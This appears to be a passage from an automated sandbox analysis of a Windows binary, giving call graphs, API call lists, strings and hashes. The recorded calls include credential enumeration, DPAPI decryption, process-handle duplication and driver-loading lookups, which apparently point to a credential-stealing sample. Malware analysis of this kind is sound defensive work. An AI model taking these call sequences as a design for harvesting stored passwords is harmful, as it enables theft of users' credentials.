440f84 12 API calls 40566->40654 40569 43b2da 40655 42370b memset memcpy memset 40569->40655 40570 43b2c9 40656 4233ae 11 API calls 40570->40656 40573 43b2f9 40657 423330 11 API calls 40573->40657 40575 43b30b 40658 423330 11 API calls 40575->40658 40577 43b325 40659 423399 11 API calls 40577->40659 40579 43b332 40660 4233ae 11 API calls 40579->40660 40581 43b354 40661 423399 11 API calls 40581->40661 40583 43b364 40662 43a82f 16 API calls 40583->40662 40585 43b370 40663 42db80 163 API calls 40585->40663 40587 43b380 40664 438c4e 163 API calls 40587->40664 40589 43b39e 40665 423399 11 API calls 40589->40665 40591 43b3ae 40666 43a76c 21 API calls 40591->40666 40593 43b3c3 40667 423399 11 API calls 40593->40667 40595->40416 40596->40418 40597->40421 40599 43a6f5 40598->40599 40600 43a765 40598->40600 40599->40600 40687 42a115 40599->40687 40600->40424 40607 4397fd memset 40600->40607 40604 43a73d 40604->40600 40605 42a115 147 API calls 40604->40605 40605->40600 40606->40426 40607->40433 40608->40424 40609->40448 40610->40437 40611->40442 40612->40438 40613->40441 40614->40446 40615->40450 40616->40452 40617->40456 40618->40463 40619->40461 40620->40465 40621->40537 40622->40458 40623->40466 40624->40470 40625->40471 40626->40471 40627->40480 40628->40484 40629->40489 40630->40495 40631->40501 40632->40506 40633->40513 40634->40530 40635->40535 40636->40554 40637->40554 40638->40554 40639->40550 40640->40557 40641->40562 40642->40532 40643->40532 40644->40532 40645->40533 40646->40541 40647->40544 40648->40546 40649->40551 40650->40555 40651->40559 40652->40563 40653->40570 40654->40569 40655->40570 40656->40573 40657->40575 40658->40577 40659->40579 40660->40581 40661->40583 40662->40585 40663->40587 40664->40589 40665->40591 40666->40593 40667->40537 40668->40494 40669->40520 40670->40499 40671->40509 40672->40510 40673->40519 40674->40486 40675->40493 40676->40500 40677->40511 40678->40508 40679->40514 40680->40522 40681->40519 40682->40525 40683->40527 40684->40537 40685->40479 40686->40424 40688 42a175 40687->40688 40690 42a122 40687->40690 40688->40600 40693 42b13b 147 API calls 40688->40693 40690->40688 40691 42a115 147 API calls 40690->40691 40694 43a174 40690->40694 40718 42a0a8 147 API calls 40690->40718 40691->40690 40693->40604 40708 43a196 40694->40708 40709 43a19e 40694->40709 40695 43a306 40695->40708 40723 4388c4 14 API calls 40695->40723 40697 42ff8c 139 API calls 40697->40709 40698 42a115 147 API calls 40698->40709 40699 415a91 memset 40699->40709 40700 43a642 40700->40708 40727 4169a7 11 API calls 40700->40727 40702 4165ff 11 API calls 40702->40709 40704 43a635 40726 42c02e memset 40704->40726 40708->40690 40709->40695 40709->40697 40709->40698 40709->40699 40709->40702 40709->40708 40719 439504 13 API calls 40709->40719 40720 4312d0 147 API calls 40709->40720 40721 42be4c memcpy memcpy memcpy memset memcpy 40709->40721 40722 43a121 11 API calls 40709->40722 40710 43a325 40710->40700 40710->40704 40710->40708 40712 42bf4c 14 API calls 40710->40712 40713 4169a7 11 API calls 40710->40713 40714 42b5b5 memset memcpy 40710->40714 40717 4165ff 11 API calls 40710->40717 40724 42b63e 14 API calls 40710->40724 40725 42bfcf memcpy 40710->40725 40712->40710 40713->40710 40714->40710 40717->40710 40718->40690 40719->40709 40720->40709 40721->40709 40722->40709 40723->40710 40724->40710 40725->40710 40726->40700 40727->40708 40728 41493c EnumResourceNamesW

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                • API String ID: 594330280-3398334509
                                                                                                                                                                • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 656 413ee4 649->656 657 413ee7-413efe 649->657 663 413ea2-413eae CloseHandle 651->663 654 413e61-413e68 652->654 655 413e37-413e44 GetModuleHandleW 652->655 654->651 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->651 663->642
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                • API String ID: 912665193-1740548384
                                                                                                                                                                • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 755 40b58d-40b59e 756 40b5a4-40b5c0 GetModuleHandleW FindResourceW 755->756 757 40b62e-40b632 755->757 758 40b5c2-40b5ce LoadResource 756->758 759 40b5e7 756->759 758->759 760 40b5d0-40b5e5 SizeofResource LockResource 758->760 761 40b5e9-40b5eb 759->761 760->761 761->757 762 40b5ed-40b5ef 761->762 762->757 763 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 762->763 763->757
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                • String ID: AE$BIN
                                                                                                                                                                • API String ID: 1668488027-3931574542
                                                                                                                                                                • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2947809556-0
                                                                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 767404330-0
                                                                                                                                                                • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                  • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$memcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2420179184-0
                                                                                                                                                                • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                                • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 19 4455e5 5->19 20 4455e8-4455f9 5->20 8 445800-445809 6->8 12 445856-44585f 8->12 13 44580b-44581e call 40a889 call 403e2d 8->13 16 445861-445874 call 40a889 call 403c9c 12->16 17 4458ac-4458b5 12->17 42 445823-445826 13->42 51 445879-44587c 16->51 21 44594f-445958 17->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 17->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 85 445685 23->85 86 4456b2-4456b5 call 40b1ab 23->86 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->49 39->3 40->39 52 44584c-445854 call 40b1ab 42->52 53 445828 42->53 182 445b08-445b15 call 40ae51 44->182 54 445c7c-445c85 45->54 55 445b38-445b96 memset * 3 45->55 150 445665-445670 call 40b1ab 49->150 151 445643-445663 call 40a9b5 call 4087b3 49->151 65 4458a2-4458aa call 40b1ab 51->65 66 44587e 51->66 52->12 67 44582e-445847 call 40a9b5 call 4087b3 53->67 61 445d1c-445d25 54->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->68 69 445b98-445ba0 55->69 74 445fae-445fb2 61->74 75 445d2b-445d3b 61->75 168 445cf5 62->168 169 445cfc-445d03 62->169 65->17 83 445884-44589d call 40a9b5 call 4087b3 66->83 138 445849 67->138 249 445c77 68->249 69->68 84 445ba2-445bcf call 4099c6 call 445403 call 445389 69->84 91 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 75->91 92 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 75->92 156 44589f 83->156 84->54 101 44568b-4456a4 call 40a9b5 call 4087b3 85->101 105 4456ba-4456c4 86->105 162 445d67-445d6c 91->162 163 445d71-445d83 call 445093 91->163 196 445e17 92->196 197 445e1e-445e25 92->197 158 4456a9-4456b0 101->158 118 4457f9 105->118 119 4456ca-4456d3 call 413cfa call 413d4c 105->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->52 150->105 151->150 153->154 154->35 156->65 158->86 158->101 174 445fa1-445fa9 call 40b6ef 162->174 163->74 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->74 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->8 218->74 253 445f9b 218->253 219->182 242->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->245 243->242 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                                • memset.MSVCRT ref: 004458CB
